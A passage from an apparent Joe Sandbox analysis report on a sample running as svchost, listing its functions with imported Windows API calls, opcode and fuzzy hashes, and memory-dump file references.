Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
Instruction ID: aed83f4b948c4985c135c6fbceb64c6b8094804d589bec6b40d7a8f706b6a698
Opcode Fuzzy Hash: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
Instruction Fuzzy Hash: 5DC14F76614B9186EB62DF26D8503EE7760FB88BC8F144015EB8E4BBA8DF79C545C700

Function 0000000140009B86 Relevance: 10.1, APIs: 8, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 000000014000A0F3
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A110
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A12E
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A195
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A1B9
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A1D5

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
Instruction ID: ed98ba6ede692f367d8fff878989292d2ab0398e512eb47c8f97488a2b74d39a
Opcode Fuzzy Hash: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
Instruction Fuzzy Hash: 7051BCB2600BC481F752CF66E8007EA23A4FB8ABCCF058119EF8D17676DF3885858740

Function 000000014000FF40 Relevance: 9.3, APIs: 6, Instructions: 317COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014000FFEC
SysFreeString.OLEAUT32 ref: 0000000140010005

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
Instruction ID: dd41a748227c6243df9798e51560345f6e40f6322dbc4b2b080599702ec169ce
Opcode Fuzzy Hash: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
Instruction Fuzzy Hash: 66E13372211AD586EF62CF26D8503ED77A0FB88BC8F449056EB8E4B669DF76C605C310

Function 0000000140004E20 Relevance: 9.2, APIs: 6, Instructions: 244memoryCOMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004E44
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004E92
HeapFree.KERNEL32 ref: 0000000140004F86
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004FA1
??3@YAXPEAX@Z.MSVCRT ref: 0000000140005061
??3@YAXPEAX@Z.MSVCRT ref: 00000001400050AF

Part of subcall function 00000001400023B0: HeapFree.KERNEL32 ref: 0000000140002412

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??3@$??2@FreeHeap
String ID:
API String ID: 1757622238-0
Opcode ID: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
Instruction ID: 29537610e8d11700659b38353b7452f6f9fc0ea2a811a385638278bdb090ea32
Opcode Fuzzy Hash: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
Instruction Fuzzy Hash: C1A15FB2205A8182EB62DF13B4507EFB3A4FB99BC5F045126EB8947BA5DF79C841C740

Function 000000014000D0F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000D189
HeapFree.KERNEL32 ref: 000000014000D1A8
HeapFree.KERNEL32 ref: 000000014000D393
HeapFree.KERNEL32 ref: 000000014000D3C0
GetLastError.KERNEL32 ref: 000000014000D3E9

Strings

*.*, xrefs: 000000014000D226

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$ErrorLast
String ID: *.*
API String ID: 2332451156-438819550
Opcode ID: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
Instruction ID: 34dfc1c74ec25d379e75e5fc480104f8909db529063c5106447f390b2015c3b2
Opcode Fuzzy Hash: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
Instruction Fuzzy Hash: 46819DB1211B8582EB66CB13E5503EA73A5FB88BC0F445126EB8A577A9EF38C941C750

Function 000000014000AFA0 Relevance: 9.1, APIs: 6, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

_wtoi.MSVCRT ref: 000000014000B036
_wtoi.MSVCRT ref: 000000014000B043
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B0FA
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B125
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B142

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_wtoi
String ID:
API String ID: 500119451-0
Opcode ID: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
Instruction ID: 369d08c27aeb9e497d69f017f6d0c736d1be854fe5c0f34ec9398f35f1db6328
Opcode Fuzzy Hash: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
Instruction Fuzzy Hash: DD516D72605B8482EB62DF57B8403ABA7A4F78DBD4F448025EF89437A5DF38C9958700

Function 00000001400062E6 Relevance: 9.1, APIs: 6, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140006506
SysFreeString.OLEAUT32 ref: 0000000140006519
SysFreeString.OLEAUT32 ref: 0000000140006527
SysFreeString.OLEAUT32 ref: 0000000140006565
SysFreeString.OLEAUT32 ref: 000000014000656F
HeapFree.KERNEL32 ref: 00000001400065AA

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
Instruction ID: 04baafabb85ef5c752686726c093db061e42867f807bf42f4ef44dac0b2fe2da
Opcode Fuzzy Hash: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
Instruction Fuzzy Hash: 47414D72205A8082EE62CF26E8503AA67A1FB8DFD9F044156EF8E577B9DF39C545C700

Function 00000001400075C0 Relevance: 9.1, APIs: 6, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

memset.MSVCRT ref: 000000014000761C
memset.MSVCRT ref: 0000000140007630

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

??2@YAPEAX_K@Z.MSVCRT ref: 000000014000768D
_time64.MSVCRT ref: 00000001400076CF
HeapFree.KERNEL32 ref: 00000001400076F9
_time64.MSVCRT ref: 000000014000770F

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: memset$_time64$??2@AddressFreeHeapHttpLibraryLoadOpenProc
String ID:
API String ID: 3106453554-0
Opcode ID: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
Instruction ID: 8b04f6f2c231c0026719b809a071ef14e3336b76cfd83b8ab9bcfbeb16143b4b
Opcode Fuzzy Hash: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
Instruction Fuzzy Hash: B7415BB2610B8082E756DF26F8543DA33A4FB48BC8F544129EB8D077A6DF39C555C780

Function 000000014000EF60 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014000EF92
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String
String ID:
API String ID: 2419388322-0
Opcode ID: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
Instruction ID: 2e050d31a97349d7cdf6a2b87fb76f8c7cecf5345a2535d832a4d2139c467b61
Opcode Fuzzy Hash: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
Instruction Fuzzy Hash: 9031F775201B8182EB96DF67E8503EA23A4F78DBC4F045126EB8A577B6CF39C8858750

Function 0000000140005D00 Relevance: 9.1, APIs: 6, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140005D1F
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005D5B
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005D8B
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DA6
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DC1
HeapFree.KERNEL32(?,?,?,?,00000001400050AC), ref: 0000000140005DDC

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String
String ID:
API String ID: 2419388322-0
Opcode ID: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
Instruction ID: 77b78661734df3ff0c0ddf4feed43cefbfa98e925e832546ec525beed8cc0a7a
Opcode Fuzzy Hash: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
Instruction Fuzzy Hash: 1F310675200B8582EB96EF57E84439A23A4F78DFC5F44411AEF8E5776ACE39C885C740

Function 0000000140008760 Relevance: 9.0, APIs: 7, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140008848
HeapFree.KERNEL32 ref: 000000014000886F
HeapFree.KERNEL32 ref: 0000000140008889
HeapFree.KERNEL32 ref: 00000001400088AB
HeapFree.KERNEL32 ref: 00000001400088CD
HeapFree.KERNEL32 ref: 00000001400088E7

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
Instruction ID: cef34096d4367dcbd8395c8382d480f973210d14fd31fa0a13d25510343ea6c8
Opcode Fuzzy Hash: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
Instruction Fuzzy Hash: B2C16EB2200B8585EB62DF13A8407EA63A4F749BC8F44812AEF8D47BA5DF39C945C744

Function 0000000140015930 Relevance: 9.0, APIs: 7, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000140015981
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B76
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B90
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BAF
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BCE
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BE8
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015C02

Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA

Part of subcall function 000000014000BFE0: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400166BE), ref: 000000014000C080

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memset
String ID:
API String ID: 631287834-0
Opcode ID: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
Instruction ID: aed008c8da3fdc3c0ff40e812c2c567fdf27eb098b86fed716892b971eaa37ac
Opcode Fuzzy Hash: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
Instruction Fuzzy Hash: 1281A231209784C5EAA6AB17A4803DAA794FB8DFC5F484115BF8D4FBB6DF3AC9058301

Function 000000014000B4C0 Relevance: 7.7, APIs: 5, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B459
Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B489
Part of subcall function 000000014000B420: HeapFree.KERNEL32 ref: 000000014000B4A9

SysFreeString.OLEAUT32 ref: 000000014000B5EC
SysFreeString.OLEAUT32 ref: 000000014000B605
_wtoi.MSVCRT ref: 000000014000B6AE

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String$_wtoi
String ID:
API String ID: 2561507145-0
Opcode ID: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
Instruction ID: e59cfff288119f3f4f904d1b27c58b2d2babdf164cacf3d3f2fd8ee1a5d65ac5
Opcode Fuzzy Hash: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
Instruction Fuzzy Hash: F9914FB6305AC585EB61CF26E8503ED23A0FB88BC9F445066EB4D4BA68DF39C645C714

Function 00000001400051B0 Relevance: 7.7, APIs: 5, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 000000014000530D
SysAllocString.OLEAUT32 ref: 00000001400053E9
SysFreeString.OLEAUT32 ref: 0000000140005400
HeapFree.KERNEL32 ref: 0000000140005423
HeapFree.KERNEL32 ref: 000000014000543D

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$String$Allocmemset
String ID:
API String ID: 185710805-0
Opcode ID: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
Instruction ID: f085215ec8c7c62c59a82486073123279e41f5413f1e3ba3c0ef527c3a066285
Opcode Fuzzy Hash: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
Instruction Fuzzy Hash: C261817260578485EA62EF17F4107EB63A0F78EBD6F488125EF8903BA5DE78C845C740

Function 0000000140017720 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014001784C
SysFreeString.OLEAUT32 ref: 000000014001785E
_wtoi.MSVCRT ref: 000000014001790E

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeString$_wtoi
String ID:
API String ID: 4250654029-0
Opcode ID: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
Instruction ID: b8226e3e0012d67e1dc081339e365a2b865a11d34d73dc99bed016e2b2b4d587
Opcode Fuzzy Hash: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
Instruction Fuzzy Hash: 5871F972301AC585EB628F26D8507ED63B0FB88BC9F449166EB4D4BA68DF36C649C314

Function 0000000140004C00 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004C66
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004D6F
_time64.MSVCRT ref: 0000000140004DA2
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DD9
HeapFree.KERNEL32 ref: 0000000140004DF5

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??3@$??2@FreeHeap_time64
String ID:
API String ID: 1052368130-0
Opcode ID: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
Instruction ID: 338fadbd8f023c31d53e71c2eb0ac7eaa7af4c98eb419c843f7b01db399d984e
Opcode Fuzzy Hash: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
Instruction Fuzzy Hash: B3515CB2200A8496EB62DF13E9907EA73A4F74CBC4F44412AEB8D47BA5DF38D955C700

Function 000000014000ABD0 Relevance: 7.6, APIs: 5, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_wtoi.MSVCRT ref: 000000014000AC62
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD15
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD45
HeapFree.KERNEL32(?,?,?,00000000,?,00000000,?,0000000140007DE7), ref: 000000014000AD62

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_wtoi
String ID:
API String ID: 500119451-0
Opcode ID: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
Instruction ID: 92a92d2dbc5a60d20047751ba9c7231f8b4528c9a95bff77d31fe694f9f08b5a
Opcode Fuzzy Hash: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
Instruction Fuzzy Hash: 93417272201B4486F762DB57B8407EA66E0F78DBD8F458126EF4E47BA5DE3CC9858300

Function 0000000140005916 Relevance: 7.6, APIs: 5, Instructions: 98memorynetworkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 0000000140005A00
freeaddrinfo.WS2_32 ref: 0000000140005A73
HeapFree.KERNEL32 ref: 0000000140005A8D
HeapFree.KERNEL32 ref: 0000000140005AAF
WSACleanup.WS2_32 ref: 0000000140005AB5

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$Cleanupfreeaddrinfogetaddrinfo
String ID:
API String ID: 2229396415-0
Opcode ID: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
Instruction ID: c73f167c002d392f22e7535e3b766fe4c5e56fea1bafe15927e8d13a21d43fb0
Opcode Fuzzy Hash: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
Instruction Fuzzy Hash: C1418C76205BC085EB62DF62A8503EB73A0FB8EB89F404116EB8E47B69DF39C545C741

Function 0000000140006BF0 Relevance: 7.6, APIs: 5, Instructions: 76networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0000000140006C17
gethostname.WS2_32 ref: 0000000140006C3D
freeaddrinfo.WS2_32 ref: 0000000140006CF8
WSACleanup.WS2_32 ref: 0000000140006CFE

Memory Dump Source

